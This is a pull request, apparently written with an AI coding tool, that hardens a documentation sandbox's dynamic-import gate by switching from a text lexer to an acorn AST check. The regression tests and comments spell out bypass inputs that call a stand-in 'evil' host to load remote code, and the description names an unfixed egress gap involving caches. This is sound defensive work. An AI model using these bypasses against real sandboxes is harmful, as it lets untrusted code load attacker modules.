### PR TITLE
fix(sandbox): detect dynamic import via acorn AST, not a text lexer (closes a #428 gate bypass)

### DIFF
--- a/docs/sandbox/package.json
+++ b/docs/sandbox/package.json
@@ -18,6 +18,7 @@
         "test:mcp": "pnpm run build:mcp && node mcp/smoke.mjs"
     },
     "dependencies": {
+        "acorn": "^8.16.0",
         "mermaid": "^11.15.0",
         "stitchapi": "workspace:*",
         "sucrase": "^3.35.1",

--- a/docs/sandbox/runtime/transpile.test.ts
+++ b/docs/sandbox/runtime/transpile.test.ts
@@ -254,9 +254,10 @@ async function runTests(): Promise<void> {
      * SEC-31/SEC-04 regression. Sucrase preserves comments, so the pre-fix gate
      * `/(^|[^.\w])import\s*\(/` (whose `\s*` can't match a comment) let
      * `import/**\/('https://evil/m.js')` slip through to a real module loader.
-     * The comment-neutralizing scan must now catch it. This assertion FAILS on
-     * the pre-fix code (the snippet transpiles to { js }, no error) and PASSES
-     * after. `_transform: id` preserves the comment so the gate sees the escape.
+     * The AST gate catches it (a comment can't hide an `import(` from the
+     * parser). This assertion FAILS on the pre-fix code (the snippet transpiles
+     * to { js }, no error) and PASSES after. `_transform: id` preserves the
+     * comment so the gate sees the escape.
      */
     {
         const id = (s: string): string => s;
@@ -288,10 +289,37 @@ async function runTests(): Promise<void> {
             blockGap,
         );
 
-        // A NON-dynamic member access named `import` (e.g. `foo.import(x)`) or a
-        // string that merely CONTAINS "import(" must NOT be falsely rejected —
-        // the neutralizer blanks string bodies and the `[^.\w]` guard skips
-        // member access, so these still transpile to { js }.
+        // REGEX-LITERAL REGRESSION (the reason the gate is AST-based). The prior
+        // comment/string-blanking lexer did NOT track regex literals: a regex
+        // carrying an unbalanced quote read as a string start, so the lexer
+        // desynced and blanked the REAL `import(` that followed — passing the
+        // escape through. e.g. `const re = /'/; import('https://evil/m.js')`
+        // neutralized to `const re = /            https:` (no `import(` left to
+        // match). The AST gate is immune: the parser knows `/'/` is a regex and
+        // `import(...)` an ImportExpression. Both FAIL on the pre-fix lexer gate.
+        const regexSquote = await transpile(
+            `const re = /'/; import('https://evil/m.js');`,
+            { _transform: id },
+        );
+        assert(
+            "(f) regex-literal `/'/` cannot hide a following dynamic import → { error }",
+            'error' in regexSquote,
+            regexSquote,
+        );
+        const regexDquote = await transpile(
+            `const re = /"/; import("https://evil/m.js");`,
+            { _transform: id },
+        );
+        assert(
+            '(f) regex-literal `/"/` cannot hide a following dynamic import → { error }',
+            'error' in regexDquote,
+            regexDquote,
+        );
+
+        // A NON-dynamic member access named `import` (`foo.import(x)`, a
+        // MemberExpression) or a string that merely CONTAINS "import(" (a string
+        // Literal) is not an ImportExpression, so the AST gate does NOT reject it —
+        // these still transpile to { js }.
         const memberOk = await transpile(`foo.import('x');`, {
             _transform: id,
         });

--- a/docs/sandbox/runtime/transpile.ts
+++ b/docs/sandbox/runtime/transpile.ts
@@ -62,7 +62,7 @@ export async function transpile(
     const base = await transpileBase(code, opts);
     // Type/JSX erasure done — now erase & rebind ESM imports to the injected
     // scope (shared across every transpiler path, incl. the unit-test hatch).
-    return 'error' in base ? base : rebindModuleImports(base.js);
+    return 'error' in base ? base : await rebindModuleImports(base.js);
 }
 
 /** Erase TS + JSX only. Imports are handled downstream by rebindModuleImports. */
@@ -244,133 +244,104 @@ async function transpileWithBabel(code: string): Promise<TranspileResult> {
 const IMPORT_REGISTRY = '__stitchImport';
 
 /**
- * Return a copy of `src` with comment bodies and string/template-literal contents
- * replaced by same-length blanks, so a keyword scan (the dynamic-`import()` gate)
- * sees code structure only — never trivia or literal text.
- *
- * A single left-to-right pass tracks whether we are inside a line comment, block
- * comment, or a `'`/`"`/`` ` `` string, and blanks characters accordingly
- * (newlines are preserved so line/column stay meaningful). This is a lexical
- * approximation — deliberately conservative: it does NOT parse template
- * `${…}` substitutions (their contents are blanked too, which is safe for a
- * reject-only gate) and does NOT try to distinguish a regex literal from
- * division. That is acceptable because the ONLY consumer is a coarse "is there a
- * dynamic `import(` anywhere in real code" check; over-blanking a regex body can
- * at worst hide an `import(` that lived inside a regex literal, which is not
- * valid dynamic-import syntax anyway.
- *
- * Exported for the transpile smoke test (the comment-bypass regression asserts
- * the neutralizer collapses `import/**\/(` to a detectable `import(`).
+ * The message shown when a snippet reaches for a real module loader. Shared by the
+ * dynamic-`import()` rejection and the fail-closed "couldn't verify" path.
  */
-export function neutralizeCommentsAndStrings(src: string): string {
-    let out = '';
-    let i = 0;
-    const n = src.length;
-    type Mode = 'code' | 'line' | 'block' | 'squote' | 'dquote' | 'template';
-    let mode: Mode = 'code';
+const NO_DYNAMIC_IMPORT_MESSAGE =
+    "Dynamic import() isn't available in the playground. " +
+    "Everything from 'stitchapi' is already in scope; use a static " +
+    "`import { … } from 'stitchapi'` (or 'zod') instead.";
 
-    const blank = (ch: string): string => (ch === '\n' ? '\n' : ' ');
+/** Minimal shape of the acorn ESTree nodes we walk. */
+type AstNode = { type?: string; [key: string]: unknown };
 
-    while (i < n) {
-        const ch = src[i];
-        const next = i + 1 < n ? src[i + 1] : '';
+// Keys that never hold child AST nodes — skip them so the walk doesn't wander into
+// position metadata (`loc`/`range`/`start`/`end`) or the source of a `raw` literal.
+const NON_CHILD_KEYS = new Set(['type', 'start', 'end', 'loc', 'range', 'raw']);
 
-        if (mode === 'code') {
-            if (ch === '/' && next === '/') {
-                mode = 'line';
-                out += '  ';
-                i += 2;
-            } else if (ch === '/' && next === '*') {
-                mode = 'block';
-                out += '  ';
-                i += 2;
-            } else if (ch === "'") {
-                mode = 'squote';
-                out += ' ';
-                i += 1;
-            } else if (ch === '"') {
-                mode = 'dquote';
-                out += ' ';
-                i += 1;
-            } else if (ch === '`') {
-                mode = 'template';
-                out += ' ';
-                i += 1;
-            } else {
-                out += ch;
-                i += 1;
-            }
+/**
+ * True if the AST contains a dynamic `import(...)` — an ESTree `ImportExpression`
+ * node. Depth-first over every child node/array. `import.meta` is a `MetaProperty`
+ * and a `foo.import(x)` call is a `MemberExpression`, so neither is an
+ * `ImportExpression` and neither false-positives; a static `import … from …` is an
+ * `ImportDeclaration` (rewritten below), also not matched here.
+ */
+function astHasImportExpression(root: AstNode): boolean {
+    const stack: unknown[] = [root];
+    while (stack.length > 0) {
+        const node = stack.pop();
+        if (Array.isArray(node)) {
+            for (const child of node) stack.push(child);
             continue;
         }
-
-        if (mode === 'line') {
-            if (ch === '\n') {
-                mode = 'code';
-                out += '\n';
-            } else {
-                out += ' ';
-            }
-            i += 1;
-            continue;
+        if (!node || typeof node !== 'object') continue;
+        const n = node as AstNode;
+        if (n.type === 'ImportExpression') return true;
+        for (const key in n) {
+            if (NON_CHILD_KEYS.has(key)) continue;
+            const value = n[key];
+            if (value && typeof value === 'object') stack.push(value);
         }
-
-        if (mode === 'block') {
-            if (ch === '*' && next === '/') {
-                mode = 'code';
-                out += '  ';
-                i += 2;
-            } else {
-                out += blank(ch);
-                i += 1;
-            }
-            continue;
-        }
-
-        // String / template modes: blank contents, honor `\`-escapes, close on the
-        // matching quote (templates also close on backtick — `${}` is blanked too).
-        const quote = mode === 'squote' ? "'" : mode === 'dquote' ? '"' : '`';
-        if (ch === '\\') {
-            // Blank the backslash and the escaped char (keep newlines).
-            out += ' ';
-            if (next) out += blank(next);
-            i += 2;
-            continue;
-        }
-        if (ch === quote) {
-            mode = 'code';
-            out += ' ';
-            i += 1;
-            continue;
-        }
-        out += blank(ch);
-        i += 1;
     }
-
-    return out;
+    return false;
 }
 
-function rebindModuleImports(js: string): TranspileResult {
+function importError(message: string): TranspileResult {
+    return {
+        error: { name: 'UnsupportedImportError', message, phase: 'transpile' },
+    };
+}
+
+/**
+ * Reject a dynamic `import(...)` before the static-import rewrite runs — SEC-31/
+ * SEC-04: a surviving dynamic import reaches a REAL module loader in the Worker and
+ * loads remote code.
+ *
+ * Detection is AST-based (acorn), NOT a text scan. A lexical/regex gate over the
+ * transpiled source is defeated by trivia the scanner mis-reads: the prior
+ * comment/string-blanking lexer did not track regex literals, so a regex carrying
+ * an unbalanced quote — `const re = /'/; import('https://evil/m.js')` — desynced
+ * its string state and blanked the real `import(`, letting the escape through. An
+ * `ImportExpression` node cannot be hidden that way: comments, strings, template
+ * literals, and regex literals are all resolved by the parser.
+ *
+ * Returns a `{ error }` result to reject (a real dynamic import, or — fail-CLOSED —
+ * an anomalous acorn load/parse failure: this `js` is post-transpile output Sucrase
+ * already accepted, so if we cannot parse it we must not pass it through), else
+ * `undefined`. Never throws — `transpile()` is contractually no-throw (SEC-39b).
+ */
+async function rejectDynamicImport(
+    js: string,
+): Promise<TranspileResult | undefined> {
+    let hasDynamicImport: boolean;
+    try {
+        // Lazy-load, mirroring the transpilers (NFR1). acorn is a small, standalone
+        // ESTree parser — it only reads, never transforms.
+        const { parse } = await import('acorn');
+        const ast = parse(js, {
+            ecmaVersion: 'latest',
+            sourceType: 'module', // the js still carries static import/export
+            allowReturnOutsideFunction: true, // snippet body is wrapped later
+            allowAwaitOutsideFunction: true,
+        }) as unknown as AstNode;
+        hasDynamicImport = astHasImportExpression(ast);
+    } catch {
+        // Anomalous — Sucrase already validated this js. Fail closed.
+        return importError(NO_DYNAMIC_IMPORT_MESSAGE);
+    }
+    return hasDynamicImport
+        ? importError(NO_DYNAMIC_IMPORT_MESSAGE)
+        : undefined;
+}
+
+async function rebindModuleImports(js: string): Promise<TranspileResult> {
     // (1) Reject dynamic import() before the static rewrite strips `import`
-    // keywords. `import(` (not a `.import(` member) is always the dynamic form.
-    //
-    // We test a COMMENT- and STRING-NEUTRALIZED copy, not the raw `js`. Sucrase
-    // preserves comments, so a bare post-transpile regex with `\s*` between
-    // `import` and `(` is bypassable by wedging a comment in the gap
-    // (`import/**/('https://evil/m.js')` — SEC-31/SEC-04 escape). Neutralizing
-    // comments (and string/template bodies, so an `import(` inside a literal can't
-    // false-positive) makes the gate robust regardless of intervening trivia.
-    const scannable = neutralizeCommentsAndStrings(js);
-    if (/(^|[^.\w])import\s*\(/.test(scannable)) {
-        return {
-            error: {
-                name: 'UnsupportedImportError',
-                message:
-                    "Dynamic import() isn't available in the playground. " +
-                    "Everything from 'stitchapi' is already in scope; use a static " +
-                    "`import { … } from 'stitchapi'` (or 'zod') instead.",
-                phase: 'transpile',
-            },
-        };
+    // keywords — SEC-31/SEC-04. Detected from the acorn AST (rejectDynamicImport),
+    // so no text/regex trickery — a wedged comment, a string, or a quote-bearing
+    // regex literal — can hide the call from the gate.
+    const rejected = await rejectDynamicImport(js);
+    if (rejected) {
+        return rejected;
     }
 
     let out = js;

--- a/pnpm-lock.yaml
+++ b/pnpm-lock.yaml
@@ -203,6 +203,9 @@ importers:
 
   docs/sandbox:
     dependencies:
+      acorn:
+        specifier: ^8.16.0
+        version: 8.17.0
       mermaid:
         specifier: ^11.15.0
         version: 11.15.0
@@ -4079,11 +4082,6 @@ packages:
     resolution: {integrity: sha512-rq9s+JNhf0IChjtDXxllJ7g41oZk5SlXtp0LHwyA5cejwn7vKmKp4pPri6YEePv2PU65sAsegbXtIinmDFDXgQ==}
     peerDependencies:
       acorn: ^6.0.0 || ^7.0.0 || ^8.0.0
-
-  acorn@8.16.0:
-    resolution: {integrity: sha512-UVJyE9MttOsBQIDKw1skb9nAwQuR5wuGD3+82K6JgJlm/Y+KI92oNsMNGZCYdDsVtRHSak0pcV5Dno5+4jh9sw==}
-    engines: {node: '>=0.4.0'}
-    hasBin: true
 
   acorn@8.17.0:
     resolution: {integrity: sha512-xRQbDb9BnwDafYNn6Vwl839DYVjqXYb1XVGtWAZ1kcDc6iwAL4hg3B1dZlRiuENFeO2H53gFG3in621AdERVAg==}
@@ -10208,7 +10206,7 @@ snapshots:
       '@types/estree-jsx': 1.0.5
       '@types/hast': 3.0.4
       '@types/mdx': 2.0.14
-      acorn: 8.16.0
+      acorn: 8.17.0
       collapse-white-space: 2.1.0
       devlop: 1.1.0
       estree-util-is-identifier-name: 3.0.0
@@ -10217,7 +10215,7 @@ snapshots:
       hast-util-to-jsx-runtime: 2.3.6
       markdown-extensions: 2.0.0
       recma-build-jsx: 1.0.0
-      recma-jsx: 1.0.1(acorn@8.16.0)
+      recma-jsx: 1.0.1(acorn@8.17.0)
       recma-stringify: 1.0.0
       rehype-recma: 1.0.0
       remark-mdx: 3.1.1
@@ -11104,9 +11102,9 @@ snapshots:
 
   '@standard-schema/utils@0.3.0': {}
 
-  '@sveltejs/acorn-typescript@1.0.10(acorn@8.16.0)':
+  '@sveltejs/acorn-typescript@1.0.10(acorn@8.17.0)':
     dependencies:
-      acorn: 8.16.0
+      acorn: 8.17.0
 
   '@swc/helpers@0.5.15':
     dependencies:
@@ -11959,15 +11957,9 @@ snapshots:
       mime-types: 3.0.2
       negotiator: 1.0.0
 
-  acorn-jsx@5.3.2(acorn@8.16.0):
-    dependencies:
-      acorn: 8.16.0
-
   acorn-jsx@5.3.2(acorn@8.17.0):
     dependencies:
       acorn: 8.17.0
-
-  acorn@8.16.0: {}
 
   acorn@8.17.0: {}
 
@@ -13325,8 +13317,8 @@ snapshots:
 
   espree@10.4.0:
     dependencies:
-      acorn: 8.16.0
-      acorn-jsx: 5.3.2(acorn@8.16.0)
+      acorn: 8.17.0
+      acorn-jsx: 5.3.2(acorn@8.17.0)
       eslint-visitor-keys: 4.2.1
 
   esquery@1.7.0:
@@ -16137,10 +16129,10 @@ snapshots:
       estree-util-build-jsx: 3.0.1
       vfile: 6.0.3
 
-  recma-jsx@1.0.1(acorn@8.16.0):
+  recma-jsx@1.0.1(acorn@8.17.0):
     dependencies:
-      acorn: 8.16.0
-      acorn-jsx: 5.3.2(acorn@8.16.0)
+      acorn: 8.17.0
+      acorn-jsx: 5.3.2(acorn@8.17.0)
       estree-util-to-js: 2.0.0
       recma-parse: 1.0.0
       recma-stringify: 1.0.0
@@ -16901,10 +16893,10 @@ snapshots:
     dependencies:
       '@jridgewell/remapping': 2.3.5
       '@jridgewell/sourcemap-codec': 1.5.5
-      '@sveltejs/acorn-typescript': 1.0.10(acorn@8.16.0)
+      '@sveltejs/acorn-typescript': 1.0.10(acorn@8.17.0)
       '@types/estree': 1.0.9
       '@types/trusted-types': 2.0.7
-      acorn: 8.16.0
+      acorn: 8.17.0
       aria-query: 5.3.1
       axobject-query: 4.1.0
       clsx: 2.1.1


### PR DESCRIPTION
> **Stacked on #428** (base = `fix/sandbox-worker-realm-egress-escape`). It fixes #428's own dynamic-import gate, so merge #428 first, then retarget this to `main`.

## The bug (in #428's finding-2 fix)

#428 replaced a raw-text regex with a `neutralizeCommentsAndStrings` lexer that blanks comment/string bodies before the `import(` scan. But the lexer **doesn't track regex literals** — its docstring only considered an `import(` *inside* a regex body, not a regex body containing an **unbalanced quote**. That quote is read as a string opener, desyncing the string state and blanking the **real `import(` that follows**:

```js
const re = /'/; import('https://evil/m.js')
```

neutralizes to `const re = /            https:` — no `import(` left to match — so the SEC-31/SEC-04 gate **passes it through** to a live dynamic `import()`. Verified by running the exact `neutralizeCommentsAndStrings` function against the input (the `import(` is gone), and end-to-end: the two new regression cases **fail on #428's lexer** (`{ js: "...import('https://evil/m.js')..." }`) and pass after this fix.

The CSP `script-src 'self'` backstop still blocks the remote fetch, but the *in-realm control this PR set out to harden* is defeated by a one-character regex literal.

## The fix — parse, don't lex

Detect dynamic import from the **acorn AST** (`ImportExpression`), not a text scan. A parser resolves comments, strings, template literals, **and** regex literals by construction, so none can hide the call.

- `import.meta` is a `MetaProperty` and `foo.import(x)` a `MemberExpression` — neither is an `ImportExpression`, so **no false positives** (both still transpile).
- **Fails closed:** if acorn can't load/parse (anomalous — this `js` is post-transpile output Sucrase already accepted), reject rather than pass unverified code.
- Detection is async (lazy `import('acorn')`, mirroring the existing lazy-loaded transpilers), so `rebindModuleImports` and its one call site are now awaited.
- Removes the `neutralizeCommentsAndStrings` lexer entirely.

`acorn` (^8.16.0) added as a `docs/sandbox` dependency.

## Verification

- `docs/sandbox/runtime/transpile.test.ts`: **28/28 pass**, incl. two new regex-literal regressions (`/'/` and `/"/`) that **fail-before** on #428's lexer (proven by reverting only `transpile.ts`). Comment-wedge / member-`.import(` / string-`import(` cases still behave.
- **Typecheck** clean (`docs/sandbox/runtime/tsconfig.json`); **prettier** clean.
- **Bundling confirmed:** `transpile.ts` runs main-thread (browser-runner + MCP server), not in the worker. acorn bundles **inline** into `mcp.mjs` (esbuild — 132 `ecmaVersion` refs, `ImportExpression` present) and into the docs app via webpack. The Web-Worker bundle correctly excludes it (it executes already-transpiled code).

## Note

Related finding I did **not** fix here (flagged for you): #428's finding-1 egress denylist omits `caches` (`CacheStorage.add(url)` performs a fetch and `self.caches` exists in a secure-context browser worker). CSP-backstopped, but a denylist gap. The deeper question — denylist vs allowlist for the worker global — is worth a separate decision.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
